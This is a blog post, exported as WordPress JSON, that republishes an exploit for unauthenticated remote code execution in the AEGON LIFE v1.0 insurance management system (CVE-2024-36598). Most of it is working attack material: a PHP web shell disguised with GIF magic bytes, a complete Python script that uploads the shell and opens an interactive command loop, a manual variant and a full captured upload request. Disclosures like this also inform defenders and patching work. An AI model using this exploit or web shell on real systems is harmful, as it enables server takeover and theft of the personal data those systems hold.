{"id":57502,"date":"2024-06-14T18:59:31","date_gmt":"2024-06-14T15:59:31","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179087\/aegonlife10-exec.txt"},"modified":"2024-06-14T18:59:31","modified_gmt":"2024-06-14T15:59:31","slug":"aegon-life-1-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aegon-life-1-0-remote-code-execution\/","title":{"rendered":"AEGON LIFE 1.0 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https:\/\/projectworlds.in\/
# Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36598<\/p>\n

# Description:
—————-<\/p>\n

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image\/gif magic bytes in payload.<\/p>\n

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.<\/p>\n

# Payload:
——————<\/p>\n

payload = “GIF89a;'<?php echo shell_exec($_GET[\\’cmd\\’]); ?>'”<\/p>\n

# RCE via executing exploit:
—————————————<\/p>\n

# Step : run the exploit in python with this command: python3 shell.py http:\/\/localhost\/lims\/
# will lead to RCE shell.<\/p>\n

POC
——————-<\/p>\n

import argparse
import random
import requests
import string
import sys<\/p>\n

parser = argparse.ArgumentParser()
parser.add_argument(‘url’, action=’store’, help=’The URL of the target.’)
args = parser.parse_args()<\/p>\n

url = args.url.rstrip(‘\/’)
random_file = ”.join(random.choice(string.ascii_letters + string.digits) for i in range(10))<\/p>\n

payload = “GIF89a;'<?php echo shell_exec($_GET[\\’cmd\\’]); ?>'”<\/p>\n

file = {‘fileToUpload’: (random_file + ‘.php’, payload, ‘text\/php’)}
print(‘> Attempting to upload PHP web shell…’)
r = requests.post(url + ‘\/insertClient.php’, files=file, data={‘agent_id’:”}, verify=False)
print(‘> Verifying shell upload…’)
r = requests.get(url + ‘\/uploads\/’ + random_file + ‘.php’, params={‘cmd’:’echo ‘ + random_file}, verify=False)<\/p>\n

if random_file in r.text:
print(‘> Web shell uploaded to ‘ + url + ‘\/uploads\/’ + random_file + ‘.php’)
print(‘> Example command usage: ‘ + url + ‘\/uploads\/’ + random_file + ‘.php?cmd=whoami’)
launch_shell = str(input(‘> Do you wish to launch a shell here? (y\/n): ‘))
if launch_shell.lower() == ‘y’:
while True:
cmd = str(input(‘RCE $ ‘))
if cmd == ‘exit’:
sys.exit(0)
r = requests.get(url + ‘\/uploads\/’ + random_file + ‘.php’, params={‘cmd’:cmd}, verify=False)
print(r.text)
else:
if r.status_code == 200:
print(‘> Web shell uploaded to ‘ + url + ‘\/uploads\/’ + random_file + ‘.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.’)
else:
print(‘> Web shell failed to upload! The web server may not have write permissions.’)<\/p>\n

—————————————————————————————————————————<\/p>\n

### Can also performed manually.<\/p>\n

Payload:
————–<\/p>\n

GIF89a;
<?php
echo”<pre>”;
passthru($_GET[‘cmd’]);
echo”<pre>”;
?><\/p>\n

# Attack Vectors:
————————-<\/p>\n

After uploading malicious image can access it to get the shell<\/p>\n

http:\/\/localhost\/lims\/uploads\/shell2.gif.php?cmd=id<\/p>\n

Burp Suit Request
—————————–<\/p>\n

POST \/lims\/insertClient.php HTTP\/1.1
Host: localhost
Content-Length: 2197
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “”
Upgrade-Insecure-Requests: 1
Origin: http:\/\/localhost
Content-Type: multipart\/form-data; boundary=—-WebKitFormBoundary5plGALZGPOOdBlF0
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.5735.134 Safari\/537.36
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http:\/\/localhost\/lims\/addClient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”client_id”<\/p>\n

1716015032<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”client_password”<\/p>\n

Password<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”name”<\/p>\n

Test<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”fileToUpload”; filename=”shell2.gif.php”
Content-Type: application\/x-php<\/p>\n

GIF89a;
<?php
echo”<pre>”;
passthru($_GET[‘cmd’]);
echo”<pre>”;
?><\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”sex”<\/p>\n

Male<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”birth_date”<\/p>\n

1\/1\/1988<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”maritial_status”<\/p>\n

M<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nid”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”phone”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”address”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”policy_id”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”agent_id”<\/p>\n

Agent007<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_id”<\/p>\n

1716015032-275794639<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_name”<\/p>\n

Test1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_sex”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_birth_date”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_nid”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_relationship”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”priority”<\/p>\n

1<\/p>\n

——WebKitFormBoundary5plGALZGPOOdBlF0
Content-Disposition: form-data; name=”nominee_phone”<\/p>\n

1
——WebKitFormBoundary5plGALZGPOOdBlF0<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https:\/\/projectworlds.in\/# Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36598 # Description:—————- -An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57502","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57502"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57502\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}